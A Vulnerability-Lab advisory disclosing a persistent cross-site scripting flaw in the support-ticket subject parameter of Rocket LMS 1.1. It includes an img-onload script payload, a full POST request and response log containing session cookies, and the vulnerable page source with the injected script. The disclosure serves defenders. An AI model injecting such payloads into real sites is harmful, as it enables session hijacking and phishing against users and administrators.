
3 changes to exploits/shellcodes uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS) Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS) Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)
236 lines
No EOL
9.7 KiB
Text
236 lines
No EOL
9.7 KiB
Text
# Exploit Title: Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)
|
|
# Exploit Author: Vulnerability-Lab
|
|
# Date: 29/12/2021
|
|
|
|
Document Title:
|
|
===============
|
|
Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
https://www.vulnerability-lab.com/get_content.php?id=2305
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2021-12-29
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
2305
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
5.4
|
|
|
|
|
|
Vulnerability Class:
|
|
====================
|
|
Cross Site Scripting - Persistent
|
|
|
|
|
|
Current Estimated Price:
|
|
========================
|
|
500€ - 1.000€
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
Rocket LMS is an online course marketplace with a pile of features that helps you to run your online education business easily.
|
|
This product helps instructors and students to get in touch together and share knowledge. Instructors will be able to create
|
|
unlimited video courses, live classes, text courses, projects, quizzes, files, etc and students will be able to use the
|
|
educational material and increase their skill level. Rocket LMS is based on real business needs, cultural differences,
|
|
advanced user researches so the product covers your business requirements efficiently.
|
|
|
|
(Copy of the Homepage:https://lms.rocket-soft.org/ )
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the Rocket LMS v1.1 cms.
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
Rocketsoft
|
|
Product: Rocket LMS v1.1 - eLearning Platform CMS (Web-Application)
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2021-09-03: Researcher Notification & Coordination (Security Researcher)
|
|
2021-09-04: Vendor Notification (Security Department)
|
|
2021-**-**: Vendor Response/Feedback (Security Department)
|
|
2021-**-**: Vendor Fix/Patch (Service Developer Team)
|
|
2021-**-**: Security Acknowledgements (Security Department)
|
|
2021-12-29: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
Medium
|
|
|
|
|
|
Authentication Type:
|
|
====================
|
|
Restricted Authentication (User Privileges)
|
|
|
|
|
|
User Interaction:
|
|
=================
|
|
Low User Interaction
|
|
|
|
|
|
Disclosure Type:
|
|
================
|
|
Responsible Disclosure
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
A persistent input validation web vulnerability has been discovered in the official Rocket LMS v1.1 cms web-application.
|
|
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
|
|
browser to web-application requests from the application-side.
|
|
|
|
The vulnerability is located in the support ticket message body. The message body does not sanitize the input of message.
|
|
Remote attackers with low privileged application user accounts are able to inject own malicious script code with persistent
|
|
attack vector. The request method to inject is post. After the inject the message a displayed again for the user and the
|
|
backend for the support (admin). The issue can be exploited by organization, student and instructor account roles.
|
|
|
|
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external
|
|
redirects to malicious source and persistent manipulation of affected application modules.
|
|
|
|
Request Method(s):
|
|
[+] POST
|
|
|
|
Vulnerable Module(s):
|
|
[+] conversations Support - New Ticket
|
|
|
|
Vulnerable Input(s):
|
|
[+] Subject
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] title
|
|
|
|
Affected Module(s):
|
|
[+] Messages History
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
|
|
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
|
|
|
|
|
|
PoC: Payload
|
|
<img src="evil.source" onload="alert(document.domain)"></img>
|
|
|
|
|
|
--- PoC Session Logs (POST) ---
|
|
https://lms.rocket-soft.org/panel/support/store
|
|
Host: lms.rocket-soft.org
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 271
|
|
Origin:https://lms.rocket-soft.org
|
|
Connection: keep-alive
|
|
Referer:https://lms.rocket-soft.org/panel/support/new
|
|
Cookie: webinar_session=eyJpdiI6ImNUeG9hcmFEbXFUSGxZd0NOZ3J6R0E9PSIsInZhbHVlIjoiWXFSOGRXYWFHcUUvc0VuNUpzanhBZjdBc21lRy8xaEhTU0hQTnk2YWlJM1ZHYkxXdzc3
|
|
T3U2Nm9yMEI3b2o2QmtCT2NjdEkyRVNwdlhWUjgwY0ZHWkNyVHJSdnBCck8vVWo4MFVsK2JvLzRDUm1BRm5zU2Y0SWZWdGR1b29keWwiLCJtYWMiOiIxODI3NDQ2OTcxZDMwNjA0M2U0
|
|
OGM3YzZmNmMzM2Y1OTk5ZTNiZTIzY2E2ZGQxMTlkYzY2YzY0Y2M5OTI5MTc5In0%3D; TawkConnectionTime=0; __tawkuuid=e::lms.rocket-soft.org::W9t6jOO76CukDtw
|
|
wAughTc4sTzqsd2xAqZJpiyabjsp3sI9le/SuCBxWz7ekNzR0::2; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6Ik9iUEZFNlZBYjJSOEVjSE1hRlNiZFE9PSIsInZhbHVlIjoiR3F1RWFsb01KREQ2K05FaG5MT1hST1
|
|
pYNmx3Z3ZoU2lDOXBQL3h3aVg0T2k2a1YwVDZYR25nUnNCOXhsWjZnWjcrQTJxUzhEa3k2N1VEdjZkZGJFMXg3Q0pIWGx6VUZwajJGc09DdUlzaFpwb0t2SHJoaHkvQmh3bTJPM0RlWVh
|
|
SRGszUlRqUVJNdlErMXpXYU5hZWlySWVrMktwZmp4RzNMSXV2TnAzTlFpQUhRalNKSmw2elhzVURqWVpqQlpkajAvUzBPcTV0Z0tXaFRFNkpmLy94TkFxa3dxdjlnOWk4VWpSRzMzeUVa
|
|
UT0iLCJtYWMiOiJkMmQ3ZTk4NzllOTQ3ZTU4ZGRjMTljMjlkMzRkODhjMmI0Mzk5MjM1ZmJlYTc1NTAxYzI2OGI3YmMwMDczMmQxIn0%3D
|
|
_token=3CmMP45TwUNoeNVPzZ4JuGunKoFqcUxbDWliz9rg&title=test1"><img src="evil.source" onload=alert(document.domain)></img>&type=course_support&webinar_id=1996&message=test2&attach=
|
|
-
|
|
POST: HTTP/1.1 302 Found
|
|
Server: Apache/2
|
|
X-Powered-By: PHP/7.4.20
|
|
Location:https://lms.rocket-soft.org/panel/support
|
|
Set-Cookie:
|
|
webinar_session=eyJpdiI6Im5OVER1cno1OXJmQnRRb3QycHExN1E9PSIsInZhbHVlIjoiOGxXdHV5em95bGh0ejh3MXlRT3dwSXFGcUZzSmMzbHlJd2xFRDhweEFBS25JeFFrMzF2Wn
|
|
lLdHc0MUpFQmN1cDY3SUE1V0hwVGRDUGZvRkRYZVYvY01BZ2NxT1NJWThXQnRiNnR3SDJ4TEZ5Q3BQUnZhR1lxUHZnR2hhLzEzSysiLCJtYWMiOiI1YjBlMmVjMjYwYjEzODVhZTJmZWZj
|
|
YTlmMGJjMThkYzQ0ZjVmNjI0NTA1MGMxM2Q3ZGVlYjlhOGJkZTY3NmM0In0%3D; Max-Age=7200; path=/; httponly; samesite=lax
|
|
Vary: Accept-Encoding,User-Agent
|
|
Content-Encoding: gzip
|
|
Access-Control-Allow-Origin: *
|
|
Access-Control-Allow-Headers: origin, x-requested-with, content-type
|
|
Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS
|
|
Content-Length: 210
|
|
Connection: Keep-Alive
|
|
Content-Type: text/html; charset=UTF-8
|
|
|
|
|
|
Vulnerable Source: conversations Support - New Ticket - Messages History
|
|
<div class="rounded-sm mt-15 border panel-shadow p-15">
|
|
<div class="d-flex align-items-center justify-content-between pb-20 border-bottom border-gray300">
|
|
<div class="user-inline-avatar d-flex align-items-center">
|
|
<div class="avatar">
|
|
<img src="/store/995/60dce9eb4290c.png" class="img-cover" alt="">
|
|
</div>
|
|
<div class="ml-10">
|
|
<span class="d-block text-dark-blue font-14 font-weight-500">Cameron Schofield</span>
|
|
<span class="mt-1 font-12 text-gray d-block">user</span>
|
|
</div></div>
|
|
<div class="d-flex flex-column align-items-end">
|
|
<span class="font-12 text-gray">2021 Sep 9 | 12:58</span>
|
|
</div></div>
|
|
<p class="text-gray mt-15 font-weight-500 font-14">"<img src="evil.source" onload="alert(document.domain)"></img></p>
|
|
</div>
|
|
|
|
|
|
Reference(s):
|
|
https://lms.rocket-soft.org/
|
|
https://lms.rocket-soft.org/panel/
|
|
https://lms.rocket-soft.org/panel/support
|
|
https://lms.rocket-soft.org/panel/support/new
|
|
https://lms.rocket-soft.org/panel/support/[id]/conversations
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
|
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
|
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
|
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
|
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
|
|
|
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
|
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
|
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
|
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
|
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
|
edit our material contact (admin@ or research@) to get a ask permission.
|
|
|
|
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
|
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE |